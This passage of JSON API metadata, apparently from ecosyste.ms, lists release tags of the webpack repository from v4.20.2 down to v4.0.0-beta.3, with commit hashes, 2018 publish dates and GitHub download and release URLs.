rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at"